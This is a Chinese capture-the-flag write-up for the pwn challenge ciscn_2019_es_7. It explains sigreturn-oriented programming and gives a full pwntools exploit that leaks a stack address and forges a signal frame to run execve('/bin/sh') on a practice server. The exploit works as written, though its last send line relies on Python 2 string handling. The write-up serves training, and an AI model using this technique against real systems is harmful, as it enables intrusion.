一、题目
ciscn_2019_es_7
二、初次感受
这是我第一次遇到这个类型的题,一开始还以为只是普通的栈溢出,然后才知道pwn这个无底洞真的是无穷无尽,特此写文记录一下。
三、分析
首先看下各种防护,是很普通的防护,绝大多数栈题都是这个配置
代码很简短,有个非常显眼的栈溢出漏洞和syscall调用,以后记住了,遇到这种情况大概率需要伪造sigreturn调用
四、原理
进行系统调用时当前进程会挂起并且将所有寄存器的值压栈,进入内核态完成相关指令后会根据栈上的信息恢复寄存器环境继续执行进程。其保存结构如下:
在这张图中有三个位置的数据是我们需要的,rax——决定使用哪个系统调用、rdi——决定系统调用的参数、rip——设置为syscall,触发获取shell。
五、代码
from pwn import *
# context.log_level = "debug"
context.arch = "amd64"
p = remote("node5.buuoj.cn",27328)
rax = 0x4004F1
syscall = 0x400517
sigreturn_addr=0x4004da
p.send(b"/bin/sh"+b"\x00"+b"A"*0x7+b"B"+p64(rax))
p.recv(0x20)
bin_sh_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
print(hex(bin_sh_addr))
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = bin_sh_addr - 0x110
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = bin_sh_addr
sigframe.rip = syscall
p.sendline("/bin/sh"+"\x00"*(0x1+0x8)+str(p64(sigreturn_addr)+p64(syscall))+str(sigframe))
p.interactive()